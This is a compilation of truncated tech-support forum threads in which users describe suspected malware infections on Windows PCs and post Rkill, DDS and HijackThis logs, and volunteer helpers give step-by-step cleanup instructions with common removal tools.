Okay, when I updated to Rkill, I got an interesting log message. Now I typically run Rkill on occasion just out of suspicion because of my paranoia that my computer is infected. It spoke of missing services and the WSService and SystemEventsBroker having incorrect Image Paths along with a lot of services missing. However I am running Windows 8 (not 8.1) 32 bit in Legacy Boot Mode, and those services are listed in the services section but they aren't running. I use Kaspersky Internet Security 2013 (not updating to 2014 due to all the issues I hear about it and am waiting for a stable version before I upgrade to it), and have run rootkit scans and full scans multiple times along with Rkill and TDSSKiller and have found no problems, as well as a Malwarebytes Anti-Malware full scan. In addition I have my Full Scan and Critical Areas scans set to Deep Scan in the Kaspersky settings and run a Critical Areas scan every day at 6PM.
Here is the log from Rkill.
Rkill 2.6.4 by Lawrence Abrams (Grinler)
Copyright 2008-2014 BleepingComputer.com
More Information about Rkill can be found at this link:
Program started at: 01/05/2014 06:12:29 PM in x86 mode.
Windows Version: Windows 8 Pro 
Checking for Windows services to stop:
 * No malware services found to stop.
Checking for processes to terminate:
 * No malware processes found t...

A:A Little Suspicious About My Computer.

This issue has already been reported - see here. Grinler, the developer, is investigating.

Thanks to anyone who helps out on this. Just lately my computer has been acting strangely. I try hard to stay on top of security fixes and anti-viral updates. Vipre AV reports nothing so I ran a hijack log. Was hoping I could post it here. Just let me know what I should do next. Thanks a bunch for all you do.

Please follow the instructions in ==>This Guide<==. If you cannot complete a step, skip it and continue. Once the proper logs are created, then make a NEW TOPIC and post it ==>HERE<==. Please include a description of your computer issues and what you have done to resolve them. If you can produce at least some of the logs, then please create the new topic and explain what happens when you try to create the log(s) that you couldn't get. If you cannot produce any of the logs, then still post the topic and explain that you followed the Prep. Guide, were unable to create the logs, and describe what happens when you try to create the logs.

I was getting a "Create an assoc. in the set assoc.control panel" error when I clicked on links. I fixed this issue by going into default programs and changing it to Internet Explorer.
Before that, when I went in & checked the set associations control panel I noticed lots of saved games (I don't play online games). Also, Google was installed recently without my knowledge so I un-installed it. I also have had Internet explorer browser pages just closing and opening to "about blank" pages. Tech support suggested getting help from the security center - I followed the help page prep procedure they supplied - below are the logs - please advise - THANKS!

DDS (Ver_2011-08-26.01) - NTFSAMD64
Internet Explorer: 9.0.8112.16421
Run by Dwightster at 14:55:12 on 2012-07-03
============== Running Processes ===============
C:\Program Files\AVAST Software\Avast\AvastSvc.exe
C:\Program Files (x86)\Windows Sidebar\sidebar.exe
C:\Program Files (x86)\IE New Window Maximizer\iemaximizer.exe
C:\Program Files (x86)\Common Files\ArcSoft\Connection Service\Bin\ACService.exe
C:\Program Files (x86)\Stardock\CursorFX\CursorFX.exe
C:\Program Files (x86)\Siber Systems\AI RoboForm\robotaskbaricon.exe
C:\Program Files\AVAST Software\Avast\AvastUI.exe
C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
C:\Program Files (x86)\HP\Button Manager\BM.exe
C:\Program Files (x86)\ArcSoft\Magic-i Visual Effects 2\uCamMonitor.exe
C:\Program Files...

A:Suspicious computer behavior

Google was installed by my anti-virus offering me a free upgrade which I clicked on. They didn't mention the google add on so I was un-aware I was getting it. Please strike that from my previous post. Thank you.

I recently have encountered some odd things happening with my computer. I have no concrete evidence that my computer is being plagued by a virus but nevertheless better safe than sorry. It all started today in the morning when I needed to photocopy a document. I turned on my computer and noticed that the whole screen had frozen. Nothing was moving, not even the cursor. I didn't think much of it because this sort of thing happens from time to time. But regardless my scanner/printer was working anyway so I went ahead and photocopied what I needed. To shut off my computer I simply pressed the Restart button and hit the Power button on start up. Later in the afternoon I turned on my computer once again. The Start menu was completely frozen and my cursor would display the hourglass icon if I moused over it. System Tray icons took a very long time to load and Task Manager had frozen on me once when I tried to see what processes were going on. The system icons had finally loaded after about 10 minutes, which is unusual, and I noticed that my avast antivirus system tray icon had a red X next to it. I opened the control system for avast and pressed the 'Fix Now' button and tried to enable the system but there was no response. Aside from that I can freely browse through the internet, but without an antivirus system functioning I am wary that I may be hit by a virus.

DDS (Ver_10-11-27.01) - NTFSx86
Run by Owner at 16:17:39.18 on 03/12/2010
Internet Explorer: 8.0.6001.18702 BrowserJava...

A:Suspicious Activity on Computer


My name is Iain and I will be helping you clean your system.

You may wish to Subscribe to this thread (Thread Tools > Subscribe to this thread) so that you are notified when you receive a reply.

Please read these instructions carefully and then print out or copy this page to Notepad in order to assist you when carrying out the fix. You should not have any open browsers or live internet connections when you are following the procedures below.

Note that the fix may take several posts. Please continue to respond to my instructions until I confirm that your logs are clean. Remember that although your symptoms may vanish, this does NOT mean that your system is clean.

If there is anything you don't understand, please ask BEFORE proceeding with the fixes.

Please ensure that you follow the instructions in the order I have them listed.

Please do not install or uninstall any programmes, or run any other scanners or software, unless I specifically ask you to do so. Also please copy and paste logs into the thread, rather than add them as attachments.

Please download DeFogger to your desktop.

Double click DeFogger to run the tool.
The application window will appear
Click the Disable button to disable your CD Emulation drivers.
Click Yes to continue
A 'Finished!' message will appear
Click OK
DeFogger will now ask to reboot the machine - click OK

IMPORTANT! If you receive an error message while running DeFogger, please post the log defogger_...

So, I know just enough to get me in trouble so I could use some help. I first began noticing issues a couple of weeks ago suddenly when no matter what I did iTunes would not connect to the iTunes Store. I tried all troubleshooting steps from iTunes and on the forums including firewall, ports, winsock reset, and I even installed an earlier version to no avail.
Now today I tried hooking up my WIFI-enabled printer and the computer and printer simply won't communicate. Through trial and error it seems that it has to do with my HomeGroup. It seems several services such as "Peer Networking Grouping" and "Peer Networking Identity Manager" were disabled. I was able to re-start the latter, but the former will not start. I get "Error 101006: The Requested service provider could not be loaded or initialized". I tried a fix I saw multiple times, deleting "idstore.sst" but no joy. I also tried changing the password or leaving the homegroup and I get error messages. I even tried "System Restore", and found that it's disabled, and it is corrupted. I have also seen that Windows Update is disabled and when I try to enable it, it says the service is not started.
I ran a comprehensive virus scan recently using Avast and nothing of note was turned up. Am I infected?

A:Suspicious Computer Issues - Windows 7

Welcome to BC !
It could be malware or adware. Use the scans below to find and remove both.
Use CCleaner to remove Temporary files, program caches, cookies, logs, etc. Use the Default settings. No need to use the
Registry Cleaning Tool...risky. Pay close attention while installing and UNcheck offers of toolbars....especially Google.
After install, open CCleaner and run by clicking on the Run Cleaner button in the bottom right corner.
CCleaner - PC Optimization and Cleaning - Free Download
Download Malwarebytes' Anti-Malware from Here
Double-click mbam-setup-2.X.X.XXXX.exe to install the application (X's are the current version number).
Make sure a checkmark is placed next to Launch Malwarebytes' Anti-Malware, then click Finish.
Once MBAM opens, when it says Your databases are out of date, click the Fix Now button.
Click the Settings tab at the top, and then in the left column, select Detections and Protections, and if not already checked place a checkmark in the selection box for Scan for rootkits.
Click the Scan tab at the top of the program window, select Threat Scan and click the Scan Now button.
If you receive a message that updates are available, click the Update Now button (the update will be downloaded, installed, and the scan will start).
The scan may take some time to finish, so please be patient.
If potential threats are detected, ensure that Quarantine is selected as the Action for all the listed items, and click the Apply Actions button.
While ...

Apologies for my stupidity...worried about using important/confidential sites until this is resolved. Thank you (very very much) in advance.
A:Suspicious .exe file opened/ran on computer

Hello, Welcome to BleepingComputer.
I'm nasdaq and will be helping you.
If you can please print this topic it will make it easier for you to follow the instructions and complete all of the necessary steps in the order listed.
===
Search and delete the AdWare, PUP (Potentially Unwanted Program) installed on your computer.
Please download AdwCleaner by Xplode onto your Desktop.
Close all open programs and internet browsers.
Double click on AdwCleaner.exe to run the tool.
Click on Delete tab follow the prompts.
A log file will automatically open after the scan has finished.
Please post the content of that log file with your next answer.
You can find the log file at C:\AdwCleaner[Rn].txt (n is a number).
===
Please download Junkware Removal Tool to your Desktop.
Please close your security software to avoid potential conflicts.
Run the tool by double-clicking it. If you are using Windows Vista or 7, right-mouse click it and select Run as administrator.
The tool will open and start scanning your system.
Please be patient as this can take a while to complete, depending on your system's specifications.
On completion, a log (JRT.txt) is saved to your Desktop and will automatically open.
Please post the contents of JRT.txt into your reply.
===
HijackThis doesn't handle Windows 7 well. In your case I need to see a final DDS Log.
You should remove HijackThis using the Add/Remove Programs list. Use the DDS tool from now on.
Please download and run this DDS Scanning Tool. Nothing will be deleted. It will just gi...

Please look over this log and tell me what you think.

My computer isn't slow, displaying popups or taking actions I don't want, but my latest automatic Windows Update attempt failed and despite a few attempts I can't connect to v6.windowsupdate.microsoft.com to initiate the update again. I also can't connect to grc.com to look at my port status-- my browser just hangs when I try to access the GRC port scanner. Both these are trusted sites in my browser.

I've also had a couple of virus events lately:

I use Zonealarm security suite and 2 days ago (about 8 hours before the Windows update failure) it alerted me that it found and quarantined "Backdoor.Win32.Agent.afqs" during a scan while I was online. It quarantined these files from the following locations:


Also on March 24, A-Squared Free found and quarantined the following:

C:\System Volume Information\_restore{B37680B2-BA0A-4E5D-BF30-83E44C588624}\RP2375\A0340046.dll Quarantined Win32.Virtob.2!IK

I couldn't find anything on the internet about these exact threats so I thought I'd wait a while to see if others reported the same problems. However the windows update issue got me worried, and the "backdoor" part got me bugged. I'm not a computer expert by any means but I'm interested in learning. I tried to run Hijackthis but it hung up after the ...

A:Computer acts differently, and I'm suspicious...

Just as a postscript to my 4/21/09 post, through the Zonealarm forum I found out that Backdoor.Win32.Agent.afqs was a false positive.

That was the good news.

The bad news was Zonealarm found this "infection" in wmiprvse.exe in the C:\WINDOWS\SYSTEM32\WBEM and DLLCACHE folders, so when I deleted the quarantined files (why is it that in hindsight that's a bad idea, but it seemed so good at the time?) I couldn't download windows updates or use my CD drive. That's what got me bugged, although at the time I didn't know all my ills were self-inflicted.

I had to go back to an earlier restore point to get that functionality back. After several hours of fretting, searching among forums for answers, and attempting Windows updating, I think I'm back where I was in the first place.

Hope my learning experience can serve as an example of what not to do for others....

I noticed a few days ago that my computer was running extremely slow. Opening Firefox and browsing the internet was so slow that the mouse would stop moving many times. My computer has 4 GB of RAM and an Intel quad core. It should not be running this slow while only browsing the web. I opened windows task messenger and noticed many processes running under my Windows account name. They looked like OS processes, but there appeared to be a lot more than there normally are. Some of these processes were taking up 600 MB of RAM. I would close the process, but over time another suspicious OS process would take up around the same amount of memory. I have another computer with the same Windows 7 OS and it doesn't have so many system processes running under the account name.
Any help would be greatly appreciated.

A:Suspicious processes slowing down computer

It doesn't look like I can attach the DDS log to my post. So I copied it and posted it down below
DDS (Ver_2012-11-20.01)
Microsoft Windows 7 Professional
Boot Device: \Device\HarddiskVolume1
Install Date: 12/14/2012 4:00:39 PM
System Uptime: 12/15/2014 2:40:53 PM (1 hours ago)
Motherboard: Intel Corporation |  | DG965OT
Processor: Intel® Core™2 Quad CPU    Q6600  @ 2.40GHz | LGA 775 | 2394/266mhz
==== Disk Partitions =========================
C: is FIXED (NTFS) - 439 GiB total, 58.966 GiB free.
D: is FIXED (NTFS) - 492 GiB total, 445.288 GiB free.
E: is CDROM ()
H: is Removable
==== Disabled Device Manager Items =============
Class GUID:
Description: PCI Simple Communications Controller
Device ID: PCI\VEN_8086&DEV_29A4&SUBSYS_505A107B&REV_02\3&18D45AA6&0&18
Name: PCI Simple Communications Controller
PNP Device ID: PCI\VEN_8086&DEV_29A4&SUBSYS_505A107B&REV_02\3&18D45AA6&0&18
Class GUID: {4d36e972-e325-11ce-bfc1-08002be10318}
Description: Intel® 82562V 10/100 Network Connection
Device ID: PCI\VEN_8086&DEV_104C&SUBSYS_0001107B&REV_02\3&18D45AA6&0&C8
Manufacturer: Intel
Name: Intel® 82562V 10/100 Network Connection
PNP Device ID: PCI\VEN_8086&DEV_104C&SUBSYS_0001107B&REV_02\3&18D45AA6&0&am...

I downloaded some risky files and now I'm noticing odd behavior from my computer. The boot up time now needs to be counted in minutes. Before it was seconds. Some programs take an extremely long time to start. There are new entries in task manager that I don't recognize. I tried rolling back the computer to a time before I had downloaded the files, but that did not have an effect on the load times. Pretty convinced that I lost the gamble this time and am now harboring undesirables.
DDS report:
DDS (Ver_2012-11-20.01) - NTFS_x86
Internet Explorer: 10.0.9200.16660  BrowserJavaVersion: 10.25.2
Run by momo at 15:15:07 on 2013-10-04
Microsoft Windows 7 Ultimate   6.1.7601.1.1252.1.1033.18.3071.1412 [GMT -7:00]
SP: Windows Defender *Enabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
============== Running Processes ================
C:\Program Files\Realtek\Audio\HDA\RtkAudioService.exe
C:\Program Files\Realtek\Audio\HDA\RtHDVBg.exe
C:\Program Files\Realtek\Audio\HDA\RtHDVBg.exe
C:\Program Files\ATI Technologies\ATI.ACE\Fuel\Fuel.Service.exe
C:\Program Files\Jump Desktop\JumpService.exe
C:\Program Files\Malwarebytes' Anti-Malware\mbamscheduler.exe
C:\Program Files\Malwarebytes' Anti-Malware\mbamservice.exe
C:\Program Files\Malwarebytes' Anti-Malware\mbamgui.exe
C:\Windows\system32\taskhos...

A:Not sure if infected, but suspicious behavior from computer.

Hello, Welcome to BleepingComputer.
I'm nasdaq and will be helping you.
If you can please print this topic it will make it easier for you to follow the instructions and complete all of the necessary steps in the order listed.
===
Please download AdwCleaner by Xplode onto your Desktop.
Close all open programs and internet browsers.
Double click on AdwCleaner.exe to run the tool.
Click the Scan button and wait for the process to complete.
Click the Report button and the report will open in Notepad.
IMPORTANT
If you click the Clean button all items listed in the report will be removed.
If you find some false positive items or programs that you wish to keep, Close the AdwCleaner windows.
Close all open programs and internet browsers.
Double click on AdwCleaner.exe to run the tool.
Click the Scan button and wait for the process to complete.
Check off the element(s) you wish to keep.
Click on the Clean button follow the prompts.
A log file will automatically open after the scan has finished.
Please post the content of that log file with your next answer.
You can find the log file at C:\AdwCleaner[Sn].txt (n is a number).

Please download Junkware Removal Tool to your Desktop.
Please close your security software to avoid potential conflicts.
Run the tool by double-clicking it. If you are using Windows Vista or 7, right-mouse click it and select Run as administrator.
The tool will open and start scanning your system.
Please be patient as this can take a while to complete, depending on your system's specifica...

Been trying to fix a m8's computer and been having problems. I have not had a chance to go down and have a bash at it one on one, but thought I'd get some advice off you guys before I take it on.

First off spec is:

Mobo - Sapphire RD480SB450 (pretty sure its a Pure Advantage)
CPU - AMD 64 3200+
GCard - X800 Sapphire (Unlocked to X850)
Ram - 512mb stick(PC3200), 256mb stick(pc2700)
OS - Xp Pro
HDD - WD 80g

Lately the computer has been turning off in random places, but 9/10 times the shutdowns occur when playing games, mainly WOW (when I say shutdown, I mean it completely turns off instantly, and he needs to turn it on again). Has happened on other games as well, but he plays WOW most. It's occurring more and more and he has never had this kind of problem until now.

But I asked him to look at his processor temperature (using SpeedFan). It could be quite extatic, going up to high temperatures like 65C. But I told him to wait till it crashed and then check the BIOS on boot to see the temperature, which he did and it was at 72C which I know is a dodgy temperature (was informed that the cut off for AMD64's is 80C, and that the maximum operating temp is around 70C before problems arise). I am assuming the processor is hitting its highest temp and just switching itself off. And perhaps the recent heat increase outside (with it being summer) has triggered this sudden burst of system shutdowns.

I did however have a similar problem myself with the same...

A:Computer randomly shutting down, suspicious CPU temp

I wouldn't reflash the BIOS again. It's very risky. I would properly reinstall the heatsink, and apply some Arctic Silver 5. (Sorry if I didn't read it, very long post.)

Those temps are extremely high for an athlon 64. Something is really wrong with the cooling system.
Does the case have some exhaust and intake fans on it? Is the CPU fan spinning correctly?

When the home computer was last started up it exhibited some very odd behaviour. The desktop background image had been changed to a plain blue screen with a warning message regarding spyware in the centre of it, and the 'Desktop' and 'Screen Saver' tabs were missing from the 'Display' option in the Control Panel. I knew how to fix this using regedit, and restored the desktop to its former image as well as reinstating the tabs, but upon rebooting the machine next time, the same happened again.

Upon investigation I found a number of very suspicious programs appearing in the Start menu (some of them were even pinned), on the desktop (seemingly out of nowhere) and in the 'Add/Remove Programs' list, from which they could not be uninstalled but did mention their locations in the the 'Program Files' folder, where they could be found within folders with long and nonsensical names: consisting of seemingly random letters and numbers. I removed all of these wherever I could.

However, I am not convinced that the machine is in the clear yet, and so thought it best to follow the 5 steps and then post a HiJack This log:

Deckard's System Scanner v20071014.68
Run by Owner on 2008-07-11 15:58:37
Computer is in Normal Mode.

System Drive C: has 4.7 GiB (less than 15%) free.

-- HijackThis (run as Owner.exe) -----------------------------------------------

Logfile of Trend Micro HijackThis v2.0...

A:Strange computer behaviour and suspicious programs

72 hours

Hey guys, My work computer is at the last stages of its career. I am on a quest to revive it before I toss it out. It has been really good to me for about 4 years or so now. I hate Vista but hey what r u gonna do.. (
Here is the deal. Computer has been really slow lately, also the desktop always refreshes itself after a certain amount of time passes by. I rearrange all the shortcuts and folders to my liking only to come back to a refreshed and arranged setting.
Also my Norton AV logfile shows a bunch of trojans and such. I am in need of help of you gurus' knowledge.
Any help would be much appreciated!!!
I attached the "attach.txt" as well as the "resolved security risks" file Norton created
Here is my DDS log
Thanks guys...
DDS (Ver_2012-11-20.01) - NTFS_x86 
Internet Explorer: 8.0.6001.19443
Run by EDE at 13:19:13 on 2013-10-21
============== Running Processes ================
C:\Program Files\DAEMON Tools Lite\DTLite.exe
C:\Windows\system3...

A:Computer has been acting up. Suspicious of Malware/Trojan

Hello, Welcome to BleepingComputer.
I'm nasdaq and will be helping you.
If you can please print this topic it will make it easier for you to follow the instructions and complete all of the necessary steps in the order listed.
===
--RogueKiller--
Download & SAVE to your Desktop RogueKiller for 32bit or Roguekiller for 64bit
Quit all programs that you may have started.
Please disconnect any USB or external drives from the computer before you run this scan!
For Vista or Windows 7, right-click and select "Run as Administrator" to start
For Windows XP, double-click to start.
Wait until Prescan has finished ...
Then Click on "Scan" button
Wait until the Status box shows "Scan Finished"
click on "delete"
Wait until the Status box shows "Deleting Finished"
Click on "Report" and copy/paste the content of the Notepad into your next reply.
The log should be found in RKreport[1].txt on your Desktop
Exit/Close RogueKiller
===
Please download AdwCleaner by Xplode onto your Desktop.
Close all open programs and internet browsers.
Double click on AdwCleaner.exe to run the tool.
Click the Scan button and wait for the process to complete.
Click the Report button and the report will open in Notepad.
IMPORTANT
If you click the Clean button all items listed in the report will be removed.
If you find some false positive items or programs that you wish to keep, Close the AdwCleaner windows.
Close all open programs and internet browsers.
Double click on AdwCleaner.exe to run the tool.
Click the Scan button and wait for t...


This computer has started showing symptoms similar to what happened to our other computer. (see thread here: http://www.bleepingcomputer.com/forums/t/553407/multiple-dllhostexe-com-surrogate-instances/)  I am seeing CPU usage of between 20% to 70% when the computer is not being used.  I also see multiple dllhost.exe *32 and dllhst3g.exe *32 processes running.  This computer runs Windows 7, and has the free version of AVG.
Please advise as to next steps.
Thank you -

A: Suspicious CPU and memory usage when computer is "idle"

You may be infected with Poweliks which typically affects the ability to browse or download files using Internet Explorer and causes PowerShell error alerts. Task Manager typically shows numerous occurrences of (COM Surrogate) dllhost.exe or dllhst3g.exe. If using a 64-bit version of Windows, then these entries will be listed as dllhost.exe *32 or dllhst3g.exe *32. These processes are known to spawn and consume a large amount of system resources as described here.

If you are having trouble downloading files with Internet Explorer, follow these instructions to re-enable downloads/reset all Security zones to default.

Please download ESETPoweliksCleaner and save it to your Desktop.
Double-click on ESETPoweliksCleaner.exe to start the tool.
Read the terms of the End-user license agreement and click Agree if you agree to them.
The tool will run automatically. If the cleaner finds a Poweliks infection, press the Y key on your keyboard to remove it...
If Poweliks was detected "Win32/Poweliks was successfully removed from your system" will be displayed.
Press any key to exit the tool and reboot your computer...
The tool will produce a log in the same directory the tool was run from.
Copy and paste the contents of that log in your next reply.

Note: If the log is too long...you may need to split it and use multiple replies in order to post all the information.


Ok, so until a couple of days back, all seemed pretty ok & then I felt the PC slowing down a bit, I didn't pay attention that time but in the morning it took ages to boot the PC, so I defragmented the drives, ran error-checks on disks, did a boot-scan with Avast, ran Malwarebytes & such, then there was an episode where all the text in all the windows was gone, be it Opera, Windows Explorer & so on, CPU running at full speed & everything, I tried to access Malwarebytes & got a message that system resources were insufficient (something like that), even Avast froze, I rebooted & ran Rkill, the only process it showed was Avast so I uninstalled it (re-installed now) & ran Malwarebytes (again), Spybot S&D, I already had Spywareblaster & Spyware Guard installed, then I downloaded, installed & scanned with Superantispyware, Panda AV, Sophos rootkit tool, Emsisoft Emergency Kit, a couple of them caught some stuff but they mostly seemed like false-positives because I could recognize most of them as gamebots but I deleted them anyway.

Anyways, so PC still seems to work, it's not slow while working but the boot still takes 5-10 minutes, previously it was probably a minute or two; maybe there are viruses or rootkits sitting in there.

Another thing I've noticed is that a CD icon has been appearing beside the pointer/cursor sometimes when waiting for something to happen, just like you know that hourglass appears beside the pointer/cu...

A: Computer booting slowly & suspicious behavior


I was signing in to my Google account when suddenly my computer downloaded a file called "comments_ajax". It had a slightly modified icon, and looked a bit like the Windows icon. When I went to view it under "Downloads" in my Windows Explorer, it says that it is a 1 KB file. I don't dare to open it. Is it malicious? Please help. Also when it downloaded, my Chrome screen stopped the sign in process and just stayed on the blank screen. Just a few hours ago, my Youtube comments started loading very slowly as well. 

A: Help Please! Computer auto-downloaded a suspicious file.

I went into my download history on Chrome and found the file listed with this link: http://www.youtube.com/comments_ajax?v=1X4iXjpbX3o

Is this malicious? The image is also similar to one of a Windows logo over a driver or something. Please help. I have since located the 1 KB file from Windows Explorer and deleted it. It was labelled under file type as "File" (I did not open it)


Yesterday my computer started asking whether I wanted to allow Windows Activation Technologies to make changes to my computer. I keep clicking "No," but it pops up again every thirty seconds to two minutes later. My computer has also become less responsive, briefly freezing every so often and not always registering when I click on something. I know WAT is a legitimate program from Microsoft, but I was on an untrustworthy site when it first started happening and I suspect something malicious got onto my computer and is trying to use the program to negatively affect my system. I'm using Windows 7 Home Premium with a 64-bit operating system on a Lenovo laptop. The program that keeps requesting permission is located at C:\Windows\system32\Wat\WatAdminSvc.exe . There's probably a lot more information you need--I've seen posts with huge logs of data--so please let me know what info you need and how to get it for you.


First of all, thanks for helping me with my problem.
Lately my computer is freezing for a few seconds while playing games,
but they DO NOT freeze for no reason, they only freeze when I hold a key down (ex. "W" to move forward, game just freezes for 10-15 sec. until I release the key). Someone suggested I go to --> power options and use the high performance power plan, but it doesn't help too much, it just takes a little bit longer for the lags to start. I've recently scanned my computer with AVAST and Malwarebytes' and I have found a few things

AVAST found something named A6000038.exe ( no clue what that is )
and Malwarebytes' found 5 infected files named " Bandoo.exe "
here is the log file :

DDS (Ver_11-03-05.01) - NTFS_AMD64
Run by WarezTD at 19:24:49.03 on Sun 03/27/2011
Internet Explorer: 8.0.7601.17514
Microsoft Windows 7 Ultimate 6.1.7601.1.1252.1.1033.18.2046.612 [GMT 2:00]
AV: avast! Antivirus *Disabled/Updated* {2B2D1395-420B-D5C9-657E-930FE358FC3C}
SP: avast! Antivirus *Disabled/Updated* {904CF271-6431-DA47-5FCE-A87D98DFB681}
SP: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
SP: IObit Security 360 *Disabled/Outdated* {FAE2835A-B90A-9E7A-85DA-82DBDA7C1E3A}
============== Running Processes ===============
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\svchost.exe -k RPCSS
C:\Windows\system32\ati...

A: Computer lags at gameplay - suspicious activity

REALLY, why are you removing my posts? I just want to get an answer because this problem is just getting worse.. >.>


Logfile of Trend Micro HijackThis v2.0.4
Scan saved at 12:48:27 AM, on 5/13/2012
Platform: Windows 7 SP1 (WinNT 6.00.3505)
MSIE: Internet Explorer v8.00 (8.00.7601.17514)
Boot mode: Normal

Running processes:
C:\Program Files (x86)\Motorola\MotoConnectService\MotoConnect.exe
C:\Program Files (x86)\Hp\Digital Imaging\bin\hpqtra08.exe
C:\Program Files (x86)\McAfee Security Scan\2.0.181\SSScheduler.exe
C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe
C:\Program Files (x86)\MSN Toolbar\Platform\4.0.0369.0\mswinext.exe
C:\Program Files (x86)\OpenOffice.org 3\program\soffice.exe
C:\Program Files (x86)\STOPzilla!\STOPzilla.exe
C:\Program Files (x86)\OpenOffice.org 3\program\soffice.bin
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe
C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
C:\Program Files (x86)\Hp\HP Software Update\hpwuschd2.exe
C:\Program Files (x86)\iTunes\iTunesHelper.exe
C:\Program Files (x86)\Avira\AntiVir Desktop\avgnt.exe
C:\Program Files (x86)\Hewlett-Packard\HP Advisor\HPAdvisor.exe
C:\Program Files (x86)\Windows Live\Messenger\msnmsgr.exe
C:\Program Files (x86)\STOPzilla!\SZOptionsFlash.exe
C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe
C:\Program Files (x86)\Avira\AntiVir Desktop\avcenter.exe
C:\Program Files (x86)\Trend Micro\HiJackThis\HiJackThis.exe
C:\Program Files (x86)\Mozilla Firefox\firefox.exe
C:\Program Files (x86)\Mozilla Firefox\plugin-container.exe
...

A: HijackThis Log, some slow & suspicious computer activity

Where are the other required logs and information?


Between using P2P file sharing apps and using cleaner/booster/optimizer/tuneup/tweak utilities, it's not surprising at all that your computer is having issues.



Hello, I've encountered performance drops with CPU usage <2% for a few months now (games worked perfectly when installed the first time; computer classification shows CPU rank 2.9 now, when I checked it for the first time it was 7.3). Since the first problems I've reinstalled it 2 times; the first one was about 1-2 months ago, the second one was today. Both of them didn't fix it. Of the tools I've used for scanning, only catchme found something suspicious. I'm using Windows 7 (the only OS with performance problems), Fedora and Arch Linux.
Thank you for your help!

DDS (Ver_2011-08-26.01) - NTFSAMD64
Internet Explorer: 9.0.8112.16421 BrowserJavaVersion: 10.5.1
Run by Jasiek at 21:14:45 on 2012-06-16
Microsoft Windows 7 Home Premium 6.1.7600.0.1250.48.1045.18.8173.6108 [GMT 2:00]
.
SP: Windows Defender *Enabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
============== Running Processes ===============
.
C:\Windows\system32\wininit.exe
C:\Windows\system32\lsm.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\nvvsvc.exe
C:\Windows\system32\svchost.exe -k RPCSS
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\system32\svchost.exe -k Networ...

A: Computer slowdown & suspicious catchme output

Hello again, I found out what was the source of the performance problems, it was caused by Intel Turbo Boost technology. It dynamically overclocks the processor to save energy, it won't overclock it if its temperature is >95°C - the part of the laptop that failed was the cooling system, filled with dust after a few months of use.
Anyways, I still have a question about this suspicious catchme log, is it some sort of malware or is catchme just not supporting win7 x64?
